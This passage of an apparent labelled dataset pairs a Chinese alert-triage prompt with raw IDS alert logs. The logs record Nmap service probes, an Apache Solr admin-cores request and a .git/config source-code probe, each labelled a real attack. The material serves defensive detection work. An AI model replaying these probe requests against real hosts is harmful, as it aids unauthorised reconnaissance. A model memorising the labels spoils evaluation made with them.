"167.99.140.169", "vuln_desc": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "public_date": "2023-03-31 14:52:15", "sport": 36762}, "solution": "目前官方已经发布新版本修改了该漏洞,建议您升级到对应的最新的版本。", "hit_start": "107", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zb2xyL2FkbWluL2NvcmVzP2FjdGlvbj1TVEFUVVMmd3Q9anNvbiBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3OjgwDQpVc2VyLUFnZW50OiBHby1odHRwLWNsaWVudC8xLjENCkNvbm5lY3Rpb246IGNsb3NlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "file_md5": "", "host": "218.76.15.17:80", "host_state": "失败", "action": "STATUS", "rule_key": "webids", "connection": "close", "api": "218.76.15.17:80/solr/admin/cores", "first_access_time": "2024-11-27 01:21:02", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "德国--黑森州--美因河畔法兰克福", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache Solr 信息泄露漏洞", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "b25a082dce622a2687fd61366c26868d", "proto": "http", "xff": "", "alarm_id": "20241127_c09485b646f6d60af6017cf9ed2b03a7", "vuln_desc": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "attack_chain": "0x01020000", "access_time": "2024-11-27 01:21:02", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "vuln_harm": "可能导致网站敏感信息泄露等", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732641642", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "167.99.140.169", "public_date": "2023-03-31 14:52:15", "dimension": "3", "wt": "json", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/solr/admin/cores", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "127", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/solr/admin/cores?action=STATUS&wt=json", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002155e", "req_header": "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1\r\nHost: 218.76.15.17:80\r\nUser-Agent: Go-http-client/1.1\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "167.99.140.169", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571998-Apache Solr 信息泄露漏洞", "rule_labels": "{\"0x10070d\": {\"parent_id\": \"0x100700\", \"type\": \"服务类型\", \"name\": \"其他\", \"parent_name\": \"未授权访问\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"software\": \"Go-http-client/1.1\", \"hw_type\": \"PC\"}}", "host_md5": "299fbf4de45e4bdbc60c66ca300e9045", "sport": "36762", "h_url": "/solr/admin/cores?action=STATUS&wt=json", "user-agent": "Go-http-client/1.1"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732641579", "vlan_id": "", "vuln_type": "发现黑客工具Nmap扫描行为", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732641579, "rule_name": "发现黑客工具Nmap扫描行为", "hit_field": "", "description": "1", "dip": "172.31.193.243", "protocol_id": 6, "hit_end": 67, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 47, "detail_info": "NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。", "packet_size": 277, "appid": 103, "proto": "sip", "xff": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "sig_id": 1742, "sport": 21299, "bulletin": "nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。"}, "hit_start": "47", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAAEHxRxAAC0GQxyKRExhrB/B81MzAFDDuy5sQdaCoFAY+vCyzAAAT1BUSU9OUyBzaXA6bm0gU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1RDUCBubTticmFuY2g9Zm9vDQpGcm9tOiA8c2lwOm5tQG5tPjt0YWc9cm9vdA0KVG86IDxzaXA6bm0yQG5tMj4NCkNhbGwtSUQ6IDUwMDAwDQpDU2VxOiA0MiBPUFRJT05TDQpNYXgtRm9yd2FyZHM6IDcwDQpDb250ZW50LUxlbmd0aDogMA0KQ29udGFjdDogPHNpcDpubUBubT4NCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQoNCg=="}, "detail_info": "NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 01:19:39", "hazard_level": "2", "hazard_rating": "低危", "rule_name": "发现黑客工具Nmap扫描行为", "packet_data": "ACSs3Z37AJShXm6HCABFAAEHxRxAAC0GQxyKRExhrB/B81MzAFDDuy5sQdaCoFAY+vCyzAAAT1BUSU9OUyBzaXA6bm0gU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1RDUCBubTticmFuY2g9Zm9vDQpGcm9tOiA8c2lwOm5tQG5tPjt0YWc9cm9vdA0KVG86IDxzaXA6bm0yQG5tMj4NCkNhbGwtSUQ6IDUwMDAwDQpDU2VxOiA0MiBPUFRJT05TDQpNYXgtRm9yd2FyZHM6IDcwDQpDb250ZW50LUxlbmd0aDogMA0KQ29udGFjdDogPHNpcDpubUBubT4NCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQoNCg==", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.31.193.243", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "fd26a8e004454e8d25e2ef8063219004", "proto": "sip", "xff": "", "alarm_id": "20241127_b77011512e50612e325b534f157a853f", "attack_chain": "0x01050000", "access_time": "2024-11-27 01:19:39", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "140E0000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732641575", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "恶意软件", "super_attack_chain": "0x01000000", "hit_end": "67", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x4ef7", "attack_org": "", "is_white": "0", "packet_size": "277", "alarm_sample": "1", "appid": "103", "attack_sip": "138.68.76.97", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "20215-发现黑客工具Nmap扫描行为", "rule_labels": "{}", "sig_id": "1742", "host_md5": "", "sport": "21299", "bulletin": "nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732641577", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SMB)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732641577, "rule_name": "发现NMAP探测行为(SMB)", "hit_field": "", "description": "1", "dip": "172.31.193.243", "protocol_id": 6, "hit_end": 221, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 201, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 222, "appid": 140, "proto": "smb", "xff": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "sig_id": 2540, "sport": 26529, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "201", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAADQkvZAAC0GdXmKRExhrB/B82ehAFCItbenQB+85FAY+vAq7wAAAAAApP9TTUJyAAAAAAgBQAAAAAAAAAAAAAAAAAAAQAYAAAEAAIEAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAk1JQ1JPU09GVCBORVRXT1JLUyAxLjAzAAJNSUNST1NPRlQgTkVUV09SS1MgMy4wAAJMQU5NQU4xLjAAAkxNMS4yWDAwMgACU2FtYmEAAk5UIExBTk1BTiAxLjAAAk5UIExNIDAuMTIA"}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 01:19:37", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SMB)", "packet_data": "ACSs3Z37AJShXm6HCABFAADQkvZAAC0GdXmKRExhrB/B82ehAFCItbenQB+85FAY+vAq7wAAAAAApP9TTUJyAAAAAAgBQAAAAAAAAAAAAAAAAAAAQAYAAAEAAIEAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAk1JQ1JPU09GVCBORVRXT1JLUyAxLjAzAAJNSUNST1NPRlQgTkVUV09SS1MgMy4wAAJMQU5NQU4xLjAAAkxNMS4yWDAwMgACU2FtYmEAAk5UIExBTk1BTiAxLjAAAk5UIExNIDAuMTIA", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.31.193.243", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "0c5ae003307287685eeee7b568b4b26e", "proto": "smb", "xff": "", "alarm_id": "20241127_5ed813135ea1f4de0b663e78ec3e9ccd", "attack_chain": "0x01050000", "access_time": "2024-11-27 01:19:37", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732641575", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "221", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b7", "attack_org": "", "is_white": "0", "packet_size": "222", "alarm_sample": "1", "appid": "140", "attack_sip": "138.68.76.97", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22967-发现NMAP探测行为(SMB)", "rule_labels": "{}", "sig_id": "2540", "host_md5": "", "sport": "26529", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732641571", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732641571, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.31.193.243", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 24907, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACWFfRAAC0G8rWKRExhrB/B82FLAFDhevreOpickVAY+vDC1AAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 01:19:31", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFAACWFfRAAC0G8rWKRExhrB/B82FLAFDhevreOpickVAY+vDC1AAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.31.193.243", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "989d41a61bc4f70596536535f3f40be8", "proto": "ssl", "xff": "", "alarm_id": "20241127_542fa288d6f07422690ddc821e57d6e1", "attack_chain": "0x01050000", "access_time": "2024-11-27 01:19:31", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732641575", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "138.68.76.97", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "24907", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732641565", "vlan_id": "", "vuln_type": "发现NMAP探测行为(RDP)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732641565, "rule_name": "发现NMAP探测行为(RDP)", "hit_field": "", "description": "1", "dip": "172.31.193.243", "protocol_id": 6, "hit_end": 85, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 65, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 96, "appid": 41, "proto": "t_120", "xff": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "sig_id": 2541, "sport": 21755, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "65", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAABSgMJAAC0GiCuKRExhrB/B81T7AFCXd0qONWwGnFAY+vDZXAAAAwAAKiXgAAAAAABDb29raWU6IG1zdHNoYXNoPW5tYXANCgEACAADAAAA"}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 01:19:25", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(RDP)", "packet_data": "ACSs3Z37AJShXm6HCABFAABSgMJAAC0GiCuKRExhrB/B81T7AFCXd0qONWwGnFAY+vDZXAAAAwAAKiXgAAAAAABDb29raWU6IG1zdHNoYXNoPW5tYXANCgEACAADAAAA", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.31.193.243", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "67e37da8cefc5c67b0957560cbe84a4d", "proto": "t_120", "xff": "", "alarm_id": "20241127_dbc999042e8b83ff748de0570e897ce4", "attack_chain": "0x01050000", "access_time": "2024-11-27 01:19:25", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732641545", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "138.68.76.97", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "85", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b8", "attack_org": "", "is_white": "0", "packet_size": "96", "alarm_sample": "1", "appid": "41", "attack_sip": "138.68.76.97", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22968-发现NMAP探测行为(RDP)", "rule_labels": "{}", "sig_id": "2541", "host_md5": "", "sport": "21755", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732641553", "vlan_id": "", "vuln_type": "发现黑客工具Nmap扫描行为", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732641553, "vuln_harm": "攻击者可通过Nmap获悉目标端口的状态及端口上运行服务的详细信息,并针对开启的端口进行攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 39, "uri": "/nice%20ports%2C/Tri%6Eity.txt%2ebak", "dport": 80, "vuln_name": "发现黑客工具Nmap扫描行为", "rsp_status": 0, "code_language": "", "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵。", "hit_start": 19, "detail_info": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "xff": "", "sip": "138.68.76.97", "vuln_desc": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "public_date": "2023-03-17 16:10:21", "sport": 11783}, "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵。", "hit_start": "19", "skyeye_id": "", "payload": {"req_header": "R0VUIC9uaWNlJTIwcG9ydHMlMkMvVHJpJTZFaXR5LnR4dCUyZWJhayBIVFRQLzEuMA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "file_md5": "98523bf24fc44ed6a0b2e66163dc2ac7", "host": "", "host_state": "失败", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 01:19:13", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "德国--黑森州--美因河畔法兰克福", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现黑客工具Nmap扫描行为", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "0615ee5cd53c86229b2bd34aa8323a97", "proto": "http", "xff": "", "alarm_id": "20241127_3d9affca62fdaaec4eeface47cec31bd", "vuln_desc": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "attack_chain": "0x01010000", "access_time": "2024-11-27 01:19:13", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "140E0000", "vuln_harm": "攻击者可通过Nmap获悉目标端口的状态及端口上运行服务的详细信息,并针对开启的端口进行攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732641533", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "138.68.76.97", "public_date": "2023-03-17 16:10:21", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/nice ports,/Trinity.txt.bak", "src_mac": "00:94:a1:5e:6e:87", "file_name": "Tri%6Eity.txt%2ebak", "confidence": "中", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "39", "h_proto_version": "HTTP/1.0\n\n", "serial_num": "QbJK/8ze/", "uri": "/nice%20ports%2C/Tri%6Eity.txt%2ebak", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002057c", "req_header": "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "138.68.76.97", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567932-发现黑客工具Nmap扫描行为", "rule_labels": "{\"0x100809\": {\"parent_id\": \"0x100800\", \"type\": \"扫描器名称\", \"name\": \"Nmap\", \"parent_name\": \"Web漏洞扫描\"}}", "host_md5": "d41d8cd98f00b204e9800998ecf8427e", "sport": "11783", "h_url": "/nice%20ports%2C/Tri%6Eity.txt%2ebak"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732640883", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732640883, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "其他", "hit_end": 15, "uri": "/server/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "179.43.163.250", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 43004}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": 